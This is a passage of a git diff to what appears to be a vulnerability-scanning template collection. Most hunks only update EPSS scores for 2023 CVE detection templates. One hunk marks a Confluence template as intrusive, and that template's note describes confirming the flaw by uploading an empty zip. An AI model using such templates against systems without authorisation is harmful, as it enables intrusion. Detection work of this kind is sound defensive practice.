0.87692 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index 01ae4ea145..0f68425251 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0602 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26647 + epss-percentile: 0.26649 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5283a04b97..01c045e14e 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-0669 cwe-id: CWE-502 epss-score: 0.96582 - epss-percentile: 0.99482 + epss-percentile: 0.99481 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index eaebfde7d1..4bd9b3622c 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0777 cwe-id: CWE-305,NVD-CWE-Other epss-score: 0.04747 - epss-percentile: 0.91746 + epss-percentile: 0.91755 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index ec43b678e8..5d95b22cd3 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0900 cwe-id: CWE-89 epss-score: 0.00475 - epss-percentile: 0.73038 + epss-percentile: 0.73067 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index f608f8f00b..33724a9237 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0942 cwe-id: CWE-79 epss-score: 0.00335 - epss-percentile: 0.68074 + epss-percentile: 0.68101 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 56c68bac19..df75b3735e 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-0947 cwe-id: CWE-22 epss-score: 0.01075 - epss-percentile: 0.82646 + epss-percentile: 0.82658 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index ecbf0d5aca..82176a6d88 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index fadc44702f..2f36bc29ad 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0968 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.61478 + epss-percentile: 0.61505 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 0bdb944b7a..2d1bbacf91 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1020 cwe-id: CWE-89 epss-score: 0.06484 - epss-percentile: 0.92944 + epss-percentile: 0.92948 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 7a1c86f95a..78d7924406 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1080 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.61478 + epss-percentile: 0.61505 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index e8d72a62a7..957333286e 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1177 - cwe-id: CWE-22,CWE-29 + cwe-id: CWE-29,CWE-22 epss-score: 0.01985 - epss-percentile: 0.87526 + epss-percentile: 0.87532 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 66e617a52a..06528c0170 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1263 cwe-id: CWE-200 epss-score: 0.00359 - epss-percentile: 0.69105 + epss-percentile: 0.69132 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index a1944f4bd7..5847593558 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1362 cwe-id: CWE-1021 epss-score: 0.00078 - epss-percentile: 0.33044 + epss-percentile: 0.33053 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 2b9c72fa43..ec503d82de 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1408 cwe-id: CWE-89 epss-score: 0.00475 - epss-percentile: 0.73038 + epss-percentile: 0.73067 cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 2180f24d7a..e19d5e6898 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1454 cwe-id: CWE-89 epss-score: 0.0391 - epss-percentile: 0.90968 + epss-percentile: 0.90973 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 17336e728c..984089b5d1 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1496 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.29168 + epss-percentile: 0.29172 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 409b08552d..4d93903395 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 109ce37291..820a76ffec 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1671 cwe-id: CWE-77 epss-score: 0.36262 - epss-percentile: 0.967 + epss-percentile: 0.96701 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 60d49bfab9..035d3f639a 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1698 cwe-id: CWE-78 epss-score: 0.52862 - epss-percentile: 0.97216 + epss-percentile: 0.97218 cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 48da244974..f1c0366e9b 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1730 cwe-id: CWE-89 epss-score: 0.06484 - epss-percentile: 0.92944 + epss-percentile: 0.92948 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index 9d3845a16d..1558196e14 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 1300000793..062c11d8ea 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index a8c4122ce7..f03d0850db 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1880 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26569 + epss-percentile: 0.26573 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 960351b093..8558932480 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-1890 cwe-id: CWE-79 epss-score: 0.00157 - epss-percentile: 0.52051 + epss-percentile: 0.52073 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 4433c4bd8a..6a59ab762f 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.52411 - epss-percentile: 0.97204 + epss-percentile: 0.97206 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 95b5c474bb..a3e8183d27 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2009 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32951 + epss-percentile: 0.32959 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index a16b5342e7..ef0b7e58b9 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -23,7 +23,7 @@ info: cvss-score: 10 cve-id: CVE-2023-20198 epss-score: 0.9556 - epss-percentile: 0.99188 + epss-percentile: 0.99189 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 27a885a8d3..49a9db98b6 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2023 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49505 + epss-percentile: 0.49521 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index c2fb1fc591..a7109fe626 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-20864 cwe-id: CWE-502 epss-score: 0.21157 - epss-percentile: 0.95869 + epss-percentile: 0.95872 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index e723b6a0c9..7e811d585f 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-20887 cwe-id: CWE-77 epss-score: 0.94544 - epss-percentile: 0.98993 + epss-percentile: 0.98994 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index b9b2f545ff..138daae2db 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-20888 cwe-id: CWE-502 epss-score: 0.24105 - epss-percentile: 0.96068 + epss-percentile: 0.96069 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index bdab73bdc2..e2812f7abb 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-20889 cwe-id: CWE-77 epss-score: 0.01964 - epss-percentile: 0.87437 + epss-percentile: 0.87444 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 87b3b1313b..a55aca1255 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26647 + epss-percentile: 0.26649 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 8ca694c0d9..5382f1b987 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.01554 - epss-percentile: 0.85759 + epss-percentile: 0.85765 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 7f3fcbb849..a0250b9b44 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32951 + epss-percentile: 0.32959 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index ef16855ef1..82f3c87128 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2224 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41494 + epss-percentile: 0.41519 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index e3a7890916..a6abd4b544 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.05554 - epss-percentile: 0.92403 + epss-score: 0.02335 + epss-percentile: 0.88563 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 75b725ae24..72a553273a 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-22463 cwe-id: CWE-798 epss-score: 0.04541 - epss-percentile: 0.9156 + epss-percentile: 0.9157 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index cde05a28d8..a289445471 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-22478 cwe-id: CWE-862 epss-score: 0.02931 - epss-percentile: 0.89709 + epss-percentile: 0.89716 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index e6ed35d068..ba085e0333 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 epss-score: 0.02114 - epss-percentile: 0.87948 + epss-percentile: 0.87954 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 75402dfdf0..d2b9162f35 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22515 epss-score: 0.95529 - epss-percentile: 0.99182 + epss-percentile: 0.99183 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 4e02d9b9d8..09e6fcb06f 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -25,7 +25,7 @@ info: product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. - tags: cve,cve2023,atlassian,confluence,rce,unauth + tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive http: - raw: @@ -55,4 +55,5 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and + # digest: 490a00463044022017ac81b9e9803195ee8e14168360734959becf13b2890ae2efdeeba3c96097fe02200149d740d0191d0ee440b9756daae69a1a3c1dd7bafbaff1d3eab9e648885f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index d8d29f5ef1..db42ae3194 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-22620 cwe-id: CWE-863 epss-score: 0.01193 - epss-percentile: 0.83605 + epss-percentile: 0.83615 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 1594488761..1f8c74bee6 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2272 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26647 + epss-percentile: 0.26649 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 838ea5b83f..22797bbd0a 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-22897 cwe-id: CWE-908 epss-score: 0.01293 - epss-percentile: 0.84355 + epss-percentile: 0.84364 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 74c8aa494e..2c4c2b0d5f 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-23161 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38747 + epss-percentile: 0.38761 cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 4ba12321f8..f23ff65ea7 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-23333 cwe-id: CWE-77 epss-score: 0.45387 - epss-percentile: 0.97006 + epss-percentile: 0.97009 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index a4c12fd3d9..cae71f00e4 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-23488 cwe-id: CWE-89 epss-score: 0.01884 - epss-percentile: 0.87152 + epss-percentile: 0.87156 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index c9844022c4..67490e2cc9 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-23491 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29493 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index b74d13e631..42b5f2f8a5 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-23492 cwe-id: CWE-89 epss-score: 0.04205 - epss-percentile: 0.9124 + epss-percentile: 0.91244 cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index a9cb581e7f..40047b5c56 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00941 - epss-percentile: 0.81383 + epss-percentile: 0.81396 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index c00e88602b..cb54325812 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -17,7 +17,7 @@ info: cvss-score: 5.3 cve-id: CVE-2023-23752 epss-score: 0.68558 - epss-percentile: 0.9762 + epss-percentile: 0.97622 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index fd6a1f6a8b..abd99b699c 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24044 cwe-id: CWE-601 epss-score: 0.00114 - epss-percentile: 0.44681 + epss-percentile: 0.44703 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index bf97a87c4d..bd05a7f064 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24243 cwe-id: CWE-918 epss-score: 0.00448 - epss-percentile: 0.72235 + epss-percentile: 0.72259 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index 0c63767536..d5b32533a2 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37798 + epss-percentile: 0.3781 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 56027beca8..6277dc3bd5 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-24322 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.32065 + epss-percentile: 0.32072 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 398ca5901e..82a11f6449 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -20,7 +20,7 